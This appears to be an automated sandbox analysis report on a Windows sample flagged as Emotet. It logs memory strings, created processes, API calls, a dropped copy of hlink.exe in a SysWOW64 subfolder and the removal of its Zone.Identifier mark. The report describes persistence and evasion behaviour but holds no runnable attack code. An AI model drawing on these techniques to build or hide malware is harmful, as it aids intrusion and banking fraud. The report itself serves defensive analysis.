Source: svchost.exe, 00000009.00000003.306454302.00000275A3E60000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 00000009.00000003.306404047.00000275A3E4B000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 00000009.00000003.306454302.00000275A3E60000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
Source: svchost.exe, 00000009.00000002.306852711.00000275A3E3D000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 00000009.00000003.306454302.00000275A3E60000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 00000009.00000003.306454302.00000275A3E60000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 00000009.00000003.306454302.00000275A3E60000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 00000009.00000002.306856777.00000275A3E42000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 00000009.00000002.306856777.00000275A3E42000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
Source: svchost.exe, 00000009.00000003.306454302.00000275A3E60000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 00000009.00000002.306869256.00000275A3E5C000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 00000009.00000003.306470665.00000275A3E5A000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 00000009.00000002.306869256.00000275A3E5C000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000009.00000002.306869256.00000275A3E5C000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000009.00000003.306432354.00000275A3E63000.00000004.00000001.sdmp, svchost.exe, 00000009.00000003.306470665.00000275A3E5A000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.t
Source: svchost.exe, 00000009.00000003.306454302.00000275A3E60000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 00000009.00000002.306852711.00000275A3E3D000.00000004.00000001.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000009.00000003.284520109.00000275A3E31000.00000004.00000001.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 00000009.00000002.306852711.00000275A3E3D000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 00000009.00000002.306852711.00000275A3E3D000.00000004.00000001.sdmp, svchost.exe, 00000009.00000002.306829909.00000275A3E13000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 00000009.00000003.306518386.00000275A3E45000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000009.00000003.306518386.00000275A3E45000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000009.00000003.284520109.00000275A3E31000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 00000009.00000003.306542156.00000275A3E3A000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 00000009.00000003.306404047.00000275A3E4B000.00000004.00000001.sdmp	String found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen

Source: hlink.exe, 00000003.00000002.502111167.000000000106A000.00000004.00000020.sdmp	Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: hlink.exe, 00000003.00000002.502111167.000000000106A000.00000004.00000020.sdmp	Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected Emotet

Show sources

Source: Yara match	File source: 00000003.00000002.501702388.0000000000E10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.502007177.0000000000FD1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.236042991.0000000003004000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.236006103.0000000002FC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.236081390.0000000003041000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.501876677.0000000000F74000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 3.2.hlink.exe.fd0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.AXZFXiJCj3.exe.3040000.1.unpack, type: UNPACKEDPE

Source: C:\Windows\SysWOW64\InputInjectionBroker\hlink.exe	Code function: 3_2_00FD2680 CryptCreateHash,CryptAcquireContextW,RtlAllocateHeap,CryptImportKey,LocalFree,CryptDecodeObjectEx,CryptGenKey,
Source: C:\Windows\SysWOW64\InputInjectionBroker\hlink.exe	Code function: 3_2_00FD2680 CryptCreateHash,CryptAcquireContextW,RtlAllocateHeap,CryptImportKey,LocalFree,CryptDecodeObjectEx,CryptGenKey,

Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	File created: C:\Windows\SysWOW64\InputInjectionBroker\			Jump to behavior
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	File created: C:\Windows\SysWOW64\InputInjectionBroker\			Jump to behavior

Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	File deleted: C:\Windows\SysWOW64\InputInjectionBroker\hlink.exe:Zone.Identifier			Jump to behavior
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	File deleted: C:\Windows\SysWOW64\InputInjectionBroker\hlink.exe:Zone.Identifier			Jump to behavior

Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_03048330
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_030486F0
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_03047B30
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_03046860
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_03044190
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_030441B7
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_030442C9
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_03043CE0
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_03043EE0
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_02FC96CE
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_02FC9ECE
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_02FCA28E
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_02FC5A7E
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_02FD7669
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_02FC5E67
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_02FC83FE
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_02FC587E
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_02FC5D55
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_02FC5D2E
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_03048330
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_030486F0
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_03047B30
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_03046860
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_03044190
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_030441B7
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_030442C9
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_03043CE0
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_03043EE0
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_02FC96CE
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_02FC9ECE
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_02FCA28E
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_02FC5A7E
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_02FD7669
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_02FC5E67
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_02FC83FE
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_02FC587E
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_02FC5D55
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_02FC5D2E
Source: C:\Windows\SysWOW64\InputInjectionBroker\hlink.exe	Code function: 3_2_00FD86F0
Source: C:\Windows\SysWOW64\InputInjectionBroker\hlink.exe	Code function: 3_2_00FD3CE0
Source: C:\Windows\SysWOW64\InputInjectionBroker\hlink.exe	Code function: 3_2_00FD3EE0
Source: C:\Windows\SysWOW64\InputInjectionBroker\hlink.exe	Code function: 3_2_00FD42C9
Source: C:\Windows\SysWOW64\InputInjectionBroker\hlink.exe	Code function: 3_2_00FD41B7
Source: C:\Windows\SysWOW64\InputInjectionBroker\hlink.exe	Code function: 3_2_00FD4190
Source: C:\Windows\SysWOW64\InputInjectionBroker\hlink.exe	Code function: 3_2_00FD6860
Source: C:\Windows\SysWOW64\InputInjectionBroker\hlink.exe	Code function: 3_2_00FD8330
Source: C:\Windows\SysWOW64\InputInjectionBroker\hlink.exe	Code function: 3_2_00FD7B30
Source: C:\Windows\SysWOW64\InputInjectionBroker\hlink.exe	Code function: 3_2_00E1587E
Source: C:\Windows\SysWOW64\InputInjectionBroker\hlink.exe	Code function: 3_2_00E15D55
Source: C:\Windows\SysWOW64\InputInjectionBroker\hlink.exe	Code function: 3_2_00E15D2E
Source: C:\Windows\SysWOW64\InputInjectionBroker\hlink.exe	Code function: 3_2_00E196CE
Source: C:\Windows\SysWOW64\InputInjectionBroker\hlink.exe	Code function: 3_2_00E19ECE
Source: C:\Windows\SysWOW64\InputInjectionBroker\hlink.exe	Code function: 3_2_00E1A28E
Source: C:\Windows\SysWOW64\InputInjectionBroker\hlink.exe	Code function: 3_2_00E15E67
Source: C:\Windows\SysWOW64\InputInjectionBroker\hlink.exe	Code function: 3_2_00E27669
Source: C:\Windows\SysWOW64\InputInjectionBroker\hlink.exe	Code function: 3_2_00E15A7E
Source: C:\Windows\SysWOW64\InputInjectionBroker\hlink.exe	Code function: 3_2_00E183FE

Source: AXZFXiJCj3.exe, 00000000.00000002.236269154.0000000003260000.00000002.00000001.sdmp	Binary or memory string: originalfilename vs AXZFXiJCj3.exe
Source: AXZFXiJCj3.exe, 00000000.00000002.236269154.0000000003260000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs AXZFXiJCj3.exe
Source: AXZFXiJCj3.exe, 00000000.00000002.236230649.0000000003200000.00000002.00000001.sdmp	Binary or memory string: System.OriginalFileName vs AXZFXiJCj3.exe
Source: AXZFXiJCj3.exe, 00000000.00000002.236269154.0000000003260000.00000002.00000001.sdmp	Binary or memory string: originalfilename vs AXZFXiJCj3.exe
Source: AXZFXiJCj3.exe, 00000000.00000002.236269154.0000000003260000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs AXZFXiJCj3.exe
Source: AXZFXiJCj3.exe, 00000000.00000002.236230649.0000000003200000.00000002.00000001.sdmp	Binary or memory string: System.OriginalFileName vs AXZFXiJCj3.exe

Source: C:\Windows\System32\svchost.exe	Section loaded: xboxlivetitleid.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cdpsgshims.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xboxlivetitleid.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cdpsgshims.dll

Source: classification engine

Classification label: mal80.troj.evad.winEXE@16/5@0/6

Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: CreateServiceW,CloseServiceHandle,_snwprintf,HeapFree,OpenSCManagerW,CloseServiceHandle,
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: CreateServiceW,CloseServiceHandle,_snwprintf,HeapFree,OpenSCManagerW,CloseServiceHandle,

Source: C:\Windows\SysWOW64\InputInjectionBroker\hlink.exe	Code function: 3_2_00FD4FD0 Process32NextW,Process32FirstW,Process32FirstW,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,FindCloseChangeNotification,
Source: C:\Windows\SysWOW64\InputInjectionBroker\hlink.exe	Code function: 3_2_00FD4FD0 Process32NextW,Process32FirstW,Process32FirstW,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,FindCloseChangeNotification,

Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_03045390 ChangeServiceConfig2W,RtlAllocateHeap,QueryServiceConfig2W,CloseServiceHandle,EnumServicesStatusExW,GetTickCount,RtlAllocateHeap,RtlAllocateHeap,HeapFree,RtlFreeHeap,
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_03045390 ChangeServiceConfig2W,RtlAllocateHeap,QueryServiceConfig2W,CloseServiceHandle,EnumServicesStatusExW,GetTickCount,RtlAllocateHeap,RtlAllocateHeap,HeapFree,RtlFreeHeap,

Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:4956:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:4956:120:WilError_01

Source: AXZFXiJCj3.exe	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: AXZFXiJCj3.exe	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	File read: C:\Users\desktop.ini			Jump to behavior
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	File read: C:\Users\desktop.ini			Jump to behavior

Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: AXZFXiJCj3.exe	Metadefender: Detection: 45%
Source: AXZFXiJCj3.exe	ReversingLabs: Detection: 70%
Source: AXZFXiJCj3.exe	Metadefender: Detection: 45%
Source: AXZFXiJCj3.exe	ReversingLabs: Detection: 70%

Source: unknown	Process created: C:\Users\user\Desktop\AXZFXiJCj3.exe 'C:\Users\user\Desktop\AXZFXiJCj3.exe'
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -p -s NgcSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s NgcCtnrSvc
Source: unknown	Process created: C:\Windows\SysWOW64\InputInjectionBroker\hlink.exe C:\Windows\SysWOW64\InputInjectionBroker\hlink.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown	Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Process created: C:\Windows\SysWOW64\InputInjectionBroker\hlink.exe C:\Windows\SysWOW64\InputInjectionBroker\hlink.exe
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Source: unknown	Process created: C:\Users\user\Desktop\AXZFXiJCj3.exe 'C:\Users\user\Desktop\AXZFXiJCj3.exe'
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -p -s NgcSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s NgcCtnrSvc
Source: unknown	Process created: C:\Windows\SysWOW64\InputInjectionBroker\hlink.exe C:\Windows\SysWOW64\InputInjectionBroker\hlink.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown	Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Process created: C:\Windows\SysWOW64\InputInjectionBroker\hlink.exe C:\Windows\SysWOW64\InputInjectionBroker\hlink.exe
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable

Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_03001030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError,
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_03001030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError,

Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_03046320 push ecx; mov dword ptr [esp], 00009128h
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_03046220 push ecx; mov dword ptr [esp], 00004B50h
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_03046240 push ecx; mov dword ptr [esp], 00008F23h
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_03046140 push ecx; mov dword ptr [esp], 00004AF2h
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_03046180 push ecx; mov dword ptr [esp], 0000D106h
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_03046090 push ecx; mov dword ptr [esp], 0000BAD9h
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_030462A0 push ecx; mov dword ptr [esp], 0000BFAAh
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_030461B0 push ecx; mov dword ptr [esp], 000003A6h
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_030462D0 push ecx; mov dword ptr [esp], 00001969h
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_030461D0 push ecx; mov dword ptr [esp], 00004B56h
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_030460F0 push ecx; mov dword ptr [esp], 0000A172h
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_02FC7EBE push ecx; mov dword ptr [esp], 00009128h
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_02FC7E6E push ecx; mov dword ptr [esp], 00001969h
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_02FC7E3E push ecx; mov dword ptr [esp], 0000BFAAh
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_02FE3FD9 push ss; iretd
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_02FD8B8F push edi; iretd
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_02FC7CDE push ecx; mov dword ptr [esp], 00004AF2h
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_02FE449C push ebx; iretd
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_02FE449C push FFFFFF95h; iretd
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_02FC7C8E push ecx; mov dword ptr [esp], 0000A172h
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_02FC7C2E push ecx; mov dword ptr [esp], 0000BAD9h
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_02FC7DDE push ecx; mov dword ptr [esp], 00008F23h
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_02FC7DBE push ecx; mov dword ptr [esp], 00004B50h
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_02FC7D6E push ecx; mov dword ptr [esp], 00004B56h
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_02FC7D4E push ecx; mov dword ptr [esp], 000003A6h
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_02FC7D1E push ecx; mov dword ptr [esp], 0000D106h
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_03046320 push ecx; mov dword ptr [esp], 00009128h
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_03046220 push ecx; mov dword ptr [esp], 00004B50h
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_03046240 push ecx; mov dword ptr [esp], 00008F23h
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_03046140 push ecx; mov dword ptr [esp], 00004AF2h
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_03046180 push ecx; mov dword ptr [esp], 0000D106h
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_03046090 push ecx; mov dword ptr [esp], 0000BAD9h
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_030462A0 push ecx; mov dword ptr [esp], 0000BFAAh
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_030461B0 push ecx; mov dword ptr [esp], 000003A6h
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_030462D0 push ecx; mov dword ptr [esp], 00001969h
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_030461D0 push ecx; mov dword ptr [esp], 00004B56h
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_030460F0 push ecx; mov dword ptr [esp], 0000A172h
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_02FC7EBE push ecx; mov dword ptr [esp], 00009128h
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_02FC7E6E push ecx; mov dword ptr [esp], 00001969h
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_02FC7E3E push ecx; mov dword ptr [esp], 0000BFAAh
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_02FE3FD9 push ss; iretd
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_02FD8B8F push edi; iretd
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_02FC7CDE push ecx; mov dword ptr [esp], 00004AF2h
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_02FE449C push ebx; iretd
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_02FE449C push FFFFFF95h; iretd
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_02FC7C8E push ecx; mov dword ptr [esp], 0000A172h
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_02FC7C2E push ecx; mov dword ptr [esp], 0000BAD9h
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_02FC7DDE push ecx; mov dword ptr [esp], 00008F23h
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_02FC7DBE push ecx; mov dword ptr [esp], 00004B50h
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_02FC7D6E push ecx; mov dword ptr [esp], 00004B56h
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_02FC7D4E push ecx; mov dword ptr [esp], 000003A6h
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_02FC7D1E push ecx; mov dword ptr [esp], 0000D106h
Source: C:\Windows\SysWOW64\InputInjectionBroker\hlink.exe	Code function: 3_2_00FD60F0 push ecx; mov dword ptr [esp], 0000A172h
Source: C:\Windows\SysWOW64\InputInjectionBroker\hlink.exe	Code function: 3_2_00FD62D0 push ecx; mov dword ptr [esp], 00001969h
Source: C:\Windows\SysWOW64\InputInjectionBroker\hlink.exe	Code function: 3_2_00FD61D0 push ecx; mov dword ptr [esp], 00004B56h
Source: C:\Windows\SysWOW64\InputInjectionBroker\hlink.exe	Code function: 3_2_00FD61B0 push ecx; mov dword ptr [esp], 000003A6h
Source: C:\Windows\SysWOW64\InputInjectionBroker\hlink.exe	Code function: 3_2_00FD62A0 push ecx; mov dword ptr [esp], 0000BFAAh

Persistence and Installation Behavior:

Drops executables to the windows directory (C:\Windows) and starts them

Show sources

Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Executable created and started: C:\Windows\SysWOW64\InputInjectionBroker\hlink.exe
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Executable created and started: C:\Windows\SysWOW64\InputInjectionBroker\hlink.exe

Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	PE file moved: C:\Windows\SysWOW64\InputInjectionBroker\hlink.exe			Jump to behavior
